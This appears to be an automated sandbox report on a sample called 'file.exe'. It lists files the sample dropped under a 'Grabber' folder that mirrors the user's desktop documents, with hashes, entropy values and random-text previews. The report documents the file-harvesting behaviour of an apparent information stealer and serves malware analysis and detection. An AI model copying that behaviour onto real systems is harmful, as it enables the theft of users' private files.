                                                                                                                                                            Preview:FAAGWHBVUUTPYVPHIDCKTSBBSJUWTPUSSQPMHQUEMEBFCRWOAGJBQFMXAGBRPPFMHYWZIVRYBYMLKSXBSVILBCREELIWCKXNLCFIWEZDKMNCFDFOVWLODVKQDZGKMNYKLEHRBLUSDVAZUPAREKTGWPSMEKUFMSLHXIKBIKFPKZTPIOVIWVCVEJBCECJMVZRWUFQKCHCDYMYSSNRYBTIYNJWBANTLSHUBWBRJPBZZNLFWUYJYBZIFPLPPSEZPOWEXVUHUJVJASMBCBQBMFYQHVFSDQVYOLOSARXZKXXONRBTMLGOTIENUWCOGJDANHCVTLBZKPLVIFICSYNNJDATITDCBHEATBFVVWLYLVGPXPBNVZHSPQOQVQNCQYBVJOQWIXIWBKDYYWBPNGFVJXXNBRMGKWWJYWGWBHIUEODZOQXRSLBZXJJPRVPCNTLVWWBLEVZTISPLUBADWNHYMMXYQUJWRECXAWEMKHIFYNPSWFNBKCKBCJAGWZVXGZAWQINZMAFPDGCTHXKXRDHWVKCCJQPZXLYTVPZLRVZELUVGBKPPWVPJNXPRLEEVEFJWIGEUIFCYFGOVZGYDSCDAQRMYJZQFYVLTANLMTLPXDPETVFGVJLPLKVCVPQFBHOXQRDYDIFYETSNYPWEVULVONZZBKSGIAZAMTXYMWISOFKQROAOZARHYXANJYXEXTERVKOFUSRDEHZCDOFBQMVCBXCHWUZOHSBRMBBAQNTBQIBXGWVMOGTTGSTIUIDNQZDCFUCSMZVEQTTRYGONMNKOUSVTNBMJXKCOXBLVQHFAAKIGBNDXZNYXNNSSESCPRHGMHBRSZZNJNGYXTMEQKCQQIYVDWDVXKEWBNJQQHOWQHHBAFFHTQLQQDBFVCGIUCNYMRAKDUTKSGMARKQACHUFYEGEUWZGJIPGBFYMIYONLAVYEOXUFICGTJCCRVOHBQQWRVQLRQIKKBTSDUERUZYUBPRBMCDSNKSKJAOCQNYWMDZDCEF

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\GJBHWQDROJ.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694921863932654
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:IrXCbQfFinplOQLb3PE8zc+qQtqXyXp0KS5bvAcIFZD/:ITCbWiplOQHXzddmyC5LkN/
                                                                                                                                                            MD5:62949C1D490A67816174BD0CD1F9264D
                                                                                                                                                            SHA1:1F3D8262179A769CDCCECE24AAAC12384E1C3F26
                                                                                                                                                            SHA-256:DD2EED4F65D047B47F0BA09DF3A4CB1AEF399952780B8011D07C7F800CFDCC89
                                                                                                                                                            SHA-512:7E067C700CD325164E580CF6BF383042143332F6E2AE57D422A676C4D50E39712FF0BBE0DBC674BDDD89EBDA26068F076AD2999811F7A171CE77F95566186807
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:GJBHWQDROJTTUSYIVSDOQIDPSJWMHPSLMXRIDWCWZNBCVLJGHNRTOFCIHNVPKSKWUWSERWJZGSUFAZTPJLUGPATEJEGCTIGWCTURHURXMOUKRCHIYAOWIWUWNKDBSKTIERRXTRYZTHTWVMTHGREIYRUGPXREMKMFRCCSZTFAKZNXFCAAULLWINOLUONZMAZSJPPRULAPILELOBZRVQKOPKDDFTRLIXEMHWSCSVLIZZXKNOZNZBAGJVHYBFATRUBEDSKAVYVSXHRDBAGYYRLMXVOWEVHNLKTHBIXHDHJVEEJCXTFXGQFGNEBKUPMFEWJGNBUBWWZZDHNTBWHLXQIQLSMFSNFFULYGZVJZMIINYLAVKHKJGRFMMFSCWJRMHAIRUCMWOSJGSZYRTETJTKRVZMRQTPGGCWVJQLUITHFHDZLCLQXAUWYRNETHGQEJCAZCLREUWRPKKEVARVYUEZJXCTUKDPOKTSLARNKLXEMFMSZXZBHQIPSSYOLUXVXNSRNTJKWKYDLHNAIREGBXNMXDZERNNOFVAEXDKZSDWXVXBHXLRTFKTHEHBWCKYBWJUSHHUDGURWSYNPQYWRSVYOLTMJLJWOQZHYSCIRNQUMSQLHBFHUQCPBTQLIOUMLSKXHTBDOAGAJCXUAAAOUZUQUDTZGIJWPQZPMPSLSQPAAHNFLWHYEVELFQFWXTMLOONNMANEDUFMOIXFUTHDDZOTKLVWUOGVMDULSQLPUPYEQDOHLXZEDRRMVKDEDNTGKNGOGCRKIPSIOEAFSSGSBZCCHZABVGPSSHTHLEAEFBAAMHOPUUTXVEGEHVKWVHABRMXGECIUCBQPOZPFHWOHRWVJVBOPBMVJWNCYFVCZIGVJIZMGHKWRVTJPZPQHZWZJEZYNHKJHGFWHCGOTLCECZSRWYLNBSBQKVGCMNZAVMUDQNJQSMHFLQSZEDWJDUOCKBPBKSNPZNGIOCHYOTBZLXOQZZCTWWKLLGKWFYIYXMWTBXLB

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\GNLQNHOLWB.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.698695541849584
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
                                                                                                                                                            MD5:64E7020B0B401F75D3061A1917D99E04
                                                                                                                                                            SHA1:785E09A2F76464E26CE282F41DE07D1B27FFB855
                                                                                                                                                            SHA-256:9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
                                                                                                                                                            SHA-512:14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:GNLQNHOLWBOQVJIFTLNFGJNNXMGUZOMCUNVQXIPWIQSXJKHHVRYLBVHOHRRAZCZOOSABVUNECAWUZDTCLDYZAFJGGGUXKDFDPLZWHOYARDSHMWUJKNJPXNWQKOEVEVLWQLXKJLHTDQZQULYODUZGGIUHFXGBKGLAQBERUUCASFPJWCVSHYWEKXXBEZZVPBKVPPRGJJFXTGVBUVLUVQNAPBMPJOZNNFCDPEHNHWSMZSBAYITASRGZTGXSYUNNLKZKAVLGDGRIUVYOWINQLHMWTCZYYSGNSZQWZQNLKENKZJSDTJDSZVFQGHKVENDXCIHQVPCJNVXYVCJTKGGQJHTLGYJROSCXNGTCNNLCBSAOHAXWLQLCXTRIYCZVDEDWKBEHBEBKKXYVNQHTFFQFVFLHQRXMYLCHQAJKIRETOPSMFDVMJOROHVBDNWQMACXDCGCPKSQUIXWYXSYDPSBSUJMXEBPBCWJDOKOSFYRZQSCWEIHCQFTRYQVAUUYDVCYUHDRUKCTOGNWSTPHONXNHSHICTVCMWIDPOKQMNGFKZOADDJPTUVPEWWFNEKDLAVDZNBHHFIRSPGSQGUQUGGIRSVJTEIAUJEHUVHRJPWEMACBNRIWVFWWRDNGHYAESSKWHOCXLPYRMKQYTXSSYLKESQEPWVDSSTKTYQDQTTAUVWPQFTTJMGMEGRECDIFCMPKXTYYNGENSBDKEVPPDNRRDLULORZGHRQIQWLMHMKLKDLNSNWXWGTMDLMPWAGGPUJXOOYWOGWZTDKIVNNXMKJEFALSJECCOVZVTAPKGAXWCUMHLAHYBPLBTDXBKKPKPJFJOKZKMPEWOOMMMCZHSENRPGKEJJHHOVFETVBBFBTDTSNLGGPVPAFDOXRJUKYZTGOFQUAVOGUZJARUUCKMRYUSWZIRYUATBQRRVCNMFMMBTGSFQCAOTPTSBPCICPBMURXQOIITZCLXKSJVDGFLGHUIHTALRYCNLFILDCLQXDOGMOKPXT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\GNLQNHOLWB.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.698695541849584
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
                                                                                                                                                            MD5:64E7020B0B401F75D3061A1917D99E04
                                                                                                                                                            SHA1:785E09A2F76464E26CE282F41DE07D1B27FFB855
                                                                                                                                                            SHA-256:9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
                                                                                                                                                            SHA-512:14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:GNLQNHOLWBOQVJIFTLNFGJNNXMGUZOMCUNVQXIPWIQSXJKHHVRYLBVHOHRRAZCZOOSABVUNECAWUZDTCLDYZAFJGGGUXKDFDPLZWHOYARDSHMWUJKNJPXNWQKOEVEVLWQLXKJLHTDQZQULYODUZGGIUHFXGBKGLAQBERUUCASFPJWCVSHYWEKXXBEZZVPBKVPPRGJJFXTGVBUVLUVQNAPBMPJOZNNFCDPEHNHWSMZSBAYITASRGZTGXSYUNNLKZKAVLGDGRIUVYOWINQLHMWTCZYYSGNSZQWZQNLKENKZJSDTJDSZVFQGHKVENDXCIHQVPCJNVXYVCJTKGGQJHTLGYJROSCXNGTCNNLCBSAOHAXWLQLCXTRIYCZVDEDWKBEHBEBKKXYVNQHTFFQFVFLHQRXMYLCHQAJKIRETOPSMFDVMJOROHVBDNWQMACXDCGCPKSQUIXWYXSYDPSBSUJMXEBPBCWJDOKOSFYRZQSCWEIHCQFTRYQVAUUYDVCYUHDRUKCTOGNWSTPHONXNHSHICTVCMWIDPOKQMNGFKZOADDJPTUVPEWWFNEKDLAVDZNBHHFIRSPGSQGUQUGGIRSVJTEIAUJEHUVHRJPWEMACBNRIWVFWWRDNGHYAESSKWHOCXLPYRMKQYTXSSYLKESQEPWVDSSTKTYQDQTTAUVWPQFTTJMGMEGRECDIFCMPKXTYYNGENSBDKEVPPDNRRDLULORZGHRQIQWLMHMKLKDLNSNWXWGTMDLMPWAGGPUJXOOYWOGWZTDKIVNNXMKJEFALSJECCOVZVTAPKGAXWCUMHLAHYBPLBTDXBKKPKPJFJOKZKMPEWOOMMMCZHSENRPGKEJJHHOVFETVBBFBTDTSNLGGPVPAFDOXRJUKYZTGOFQUAVOGUZJARUUCKMRYUSWZIRYUATBQRRVCNMFMMBTGSFQCAOTPTSBPCICPBMURXQOIITZCLXKSJVDGFLGHUIHTALRYCNLFILDCLQXDOGMOKPXT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\HQJBRDYKDE.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\HQJBRDYKDE.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\HQJBRDYKDE.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\HQJBRDYKDE\FAAGWHBVUU.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.696563923881884
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:5/VaDtnzLQ+f43tOT8I+KwurMekIRdXEt5L3tYor2Xp2CpvirtyrRofz/:hVaDQ3t9I+AFlXE7L3yLprvMEaD
                                                                                                                                                            MD5:CD90073A050D84BFC07DF7516A76BE8F
                                                                                                                                                            SHA1:5BA173F226A697FF62B1208D33B3BACA3B2EFC1D
                                                                                                                                                            SHA-256:8E77CEDA3994BC3AD371B51807B7B77A08F2F5A3A232C0991C4763C9B2E78E13
                                                                                                                                                            SHA-512:A07B25F8DB5B2E680122920BBDCFB6138ACD8856F203A447ED6E63E2411388567CC7ADB1C2DC2F9B87C7DCFD9671D1EAC8CB9FF9BB10677806755D739478C328
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:FAAGWHBVUUTPYVPHIDCKTSBBSJUWTPUSSQPMHQUEMEBFCRWOAGJBQFMXAGBRPPFMHYWZIVRYBYMLKSXBSVILBCREELIWCKXNLCFIWEZDKMNCFDFOVWLODVKQDZGKMNYKLEHRBLUSDVAZUPAREKTGWPSMEKUFMSLHXIKBIKFPKZTPIOVIWVCVEJBCECJMVZRWUFQKCHCDYMYSSNRYBTIYNJWBANTLSHUBWBRJPBZZNLFWUYJYBZIFPLPPSEZPOWEXVUHUJVJASMBCBQBMFYQHVFSDQVYOLOSARXZKXXONRBTMLGOTIENUWCOGJDANHCVTLBZKPLVIFICSYNNJDATITDCBHEATBFVVWLYLVGPXPBNVZHSPQOQVQNCQYBVJOQWIXIWBKDYYWBPNGFVJXXNBRMGKWWJYWGWBHIUEODZOQXRSLBZXJJPRVPCNTLVWWBLEVZTISPLUBADWNHYMMXYQUJWRECXAWEMKHIFYNPSWFNBKCKBCJAGWZVXGZAWQINZMAFPDGCTHXKXRDHWVKCCJQPZXLYTVPZLRVZELUVGBKPPWVPJNXPRLEEVEFJWIGEUIFCYFGOVZGYDSCDAQRMYJZQFYVLTANLMTLPXDPETVFGVJLPLKVCVPQFBHOXQRDYDIFYETSNYPWEVULVONZZBKSGIAZAMTXYMWISOFKQROAOZARHYXANJYXEXTERVKOFUSRDEHZCDOFBQMVCBXCHWUZOHSBRMBBAQNTBQIBXGWVMOGTTGSTIUIDNQZDCFUCSMZVEQTTRYGONMNKOUSVTNBMJXKCOXBLVQHFAAKIGBNDXZNYXNNSSESCPRHGMHBRSZZNJNGYXTMEQKCQQIYVDWDVXKEWBNJQQHOWQHHBAFFHTQLQQDBFVCGIUCNYMRAKDUTKSGMARKQACHUFYEGEUWZGJIPGBFYMIYONLAVYEOXUFICGTJCCRVOHBQQWRVQLRQIKKBTSDUERUZYUBPRBMCDSNKSKJAOCQNYWMDZDCEF

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\HQJBRDYKDE\GJBHWQDROJ.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694921863932654
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:IrXCbQfFinplOQLb3PE8zc+qQtqXyXp0KS5bvAcIFZD/:ITCbWiplOQHXzddmyC5LkN/
                                                                                                                                                            MD5:62949C1D490A67816174BD0CD1F9264D
                                                                                                                                                            SHA1:1F3D8262179A769CDCCECE24AAAC12384E1C3F26
                                                                                                                                                            SHA-256:DD2EED4F65D047B47F0BA09DF3A4CB1AEF399952780B8011D07C7F800CFDCC89
                                                                                                                                                            SHA-512:7E067C700CD325164E580CF6BF383042143332F6E2AE57D422A676C4D50E39712FF0BBE0DBC674BDDD89EBDA26068F076AD2999811F7A171CE77F95566186807
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:GJBHWQDROJTTUSYIVSDOQIDPSJWMHPSLMXRIDWCWZNBCVLJGHNRTOFCIHNVPKSKWUWSERWJZGSUFAZTPJLUGPATEJEGCTIGWCTURHURXMOUKRCHIYAOWIWUWNKDBSKTIERRXTRYZTHTWVMTHGREIYRUGPXREMKMFRCCSZTFAKZNXFCAAULLWINOLUONZMAZSJPPRULAPILELOBZRVQKOPKDDFTRLIXEMHWSCSVLIZZXKNOZNZBAGJVHYBFATRUBEDSKAVYVSXHRDBAGYYRLMXVOWEVHNLKTHBIXHDHJVEEJCXTFXGQFGNEBKUPMFEWJGNBUBWWZZDHNTBWHLXQIQLSMFSNFFULYGZVJZMIINYLAVKHKJGRFMMFSCWJRMHAIRUCMWOSJGSZYRTETJTKRVZMRQTPGGCWVJQLUITHFHDZLCLQXAUWYRNETHGQEJCAZCLREUWRPKKEVARVYUEZJXCTUKDPOKTSLARNKLXEMFMSZXZBHQIPSSYOLUXVXNSRNTJKWKYDLHNAIREGBXNMXDZERNNOFVAEXDKZSDWXVXBHXLRTFKTHEHBWCKYBWJUSHHUDGURWSYNPQYWRSVYOLTMJLJWOQZHYSCIRNQUMSQLHBFHUQCPBTQLIOUMLSKXHTBDOAGAJCXUAAAOUZUQUDTZGIJWPQZPMPSLSQPAAHNFLWHYEVELFQFWXTMLOONNMANEDUFMOIXFUTHDDZOTKLVWUOGVMDULSQLPUPYEQDOHLXZEDRRMVKDEDNTGKNGOGCRKIPSIOEAFSSGSBZCCHZABVGPSSHTHLEAEFBAAMHOPUUTXVEGEHVKWVHABRMXGECIUCBQPOZPFHWOHRWVJVBOPBMVJWNCYFVCZIGVJIZMGHKWRVTJPZPQHZWZJEZYNHKJHGFWHCGOTLCECZSRWYLNBSBQKVGCMNZAVMUDQNJQSMHFLQSZEDWJDUOCKBPBKSNPZNGIOCHYOTBZLXOQZZCTWWKLLGKWFYIYXMWTBXLB

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\HQJBRDYKDE\GNLQNHOLWB.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.698695541849584
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
                                                                                                                                                            MD5:64E7020B0B401F75D3061A1917D99E04
                                                                                                                                                            SHA1:785E09A2F76464E26CE282F41DE07D1B27FFB855
                                                                                                                                                            SHA-256:9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
                                                                                                                                                            SHA-512:14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
                                                                                                                                                            Malicious:false
